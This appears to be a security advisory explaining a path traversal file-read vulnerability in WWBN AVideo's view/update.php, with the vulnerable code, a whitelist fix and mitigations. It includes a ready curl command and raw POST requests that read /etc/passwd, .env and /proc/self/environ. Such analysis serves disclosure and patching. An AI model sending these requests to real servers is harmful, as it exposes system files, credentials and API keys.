Listen to this Post
How the CVE works
The vulnerability exists in view/update.php, which processes a POST request containing the parameter updateFile. This parameter is intended to specify a database migration file located in the `updatedb/` directory. However, the application fails to validate or sanitize the user-supplied value before concatenating it into a file path.
Specifically, on lines 134-145 of view/update.php, the code checks if `$_POST[‘updateFile’]` is not empty. If it is set, the script proceeds to clear a cache directory and then constructs a file path using $global['systemRootPath'] . "updatedb/" . $_POST['updateFile']. This path is passed directly to PHP’s `file()` function, which reads the file and returns each line as an array element.
Although `User::isAdmin()` and `adminSecurityCheck(true)` enforce administrator authentication on lines 12-15 of the same file, no further checks are applied to the `updateFile` parameter. This allows an authenticated administrator to use path traversal sequences like `../` to escape the intended `updatedb/` directory.
By sending a POST request to `/view/update.php` with updateFile=../../../../etc/passwd, an attacker can read the contents of the server’s password file. The script subsequently iterates over the returned lines and echoes them as part of the HTML output, effectively disclosing sensitive information. Similarly, `../../../../proc/self/environ` can be used to read the web server’s environment variables on Linux systems.
The vulnerability is present because there is no whitelist of allowed files, no extension validation, and no sanitization of the path. It has been verified on the master branch of WWBN/AVideo (commit bc0340662) and likely affects all releases where `view/update.php` contains the `$_POST[‘updateFile’]` consumer, with the pattern predating 2024.
dailycve form
Platform: WWBN AVideo
Version: < 2024 (all releases)
Vulnerability : LFI (Arbitrary File Read)
Severity: Medium
date: 2026-05-12
Prediction: Patch expected 2026-06-15
Analytics under heading What Undercode Say:
Vulnerability Check: Test for LFI by requesting /etc/passwd
curl -X POST http://target.com/view/update.php \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "updateFile=../../../../etc/passwd"
Code Review (vulnerable snippet from view/update.php)
if (!empty($_POST['updateFile'])) {
$dir = Video::getStoragePath() . "cache";
rrmdir($dir);
$lines = file("{$global['systemRootPath']}updatedb/{$_POST['updateFile']}");
// No sanitization of $_POST['updateFile']
}
Fix (add path validation)
$allowed_files = ['file1.sql', 'file2.sql'];
$file = $_POST['updateFile'];
if (!in_array($file, $allowed_files)) {
die("Invalid file.");
}
$lines = file("{$global['systemRootPath']}updatedb/" . $file);
Exploit:
Read /etc/passwd POST /view/update.php HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded Content-Length: 27 updateFile=../../../../etc/passwd Read .env configuration POST /view/update.php HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded updateFile=../../../../.env Read web server environment variables POST /view/update.php HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded updateFile=../../../../proc/self/environ
Protection from this CVE
- Immediate Mitigation: Restrict access to `view/update.php` at the web server level (e.g., using `.htaccess` or Nginx location blocks) to only allow requests from trusted IP addresses.
- Code Fix: Apply input validation by implementing a strict whitelist of allowed filenames. Reject any input containing
../,..\, or other path traversal patterns. - Upgrade: Monitor the official WWBN/AVideo repository for a security patch and update to a fixed version as soon as it becomes available.
Impact
An authenticated administrator can read arbitrary text files accessible to the web server process. This includes sensitive files such as /etc/passwd, application configuration files (e.g., .env), source code, log files, and other system files. Exposure of database credentials, API keys, or environment variables can lead to further compromise of the server and connected systems. The vulnerability is limited to authenticated users with administrative privileges, but on misconfigured deployments where default credentials are unchanged, the risk escalates significantly.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

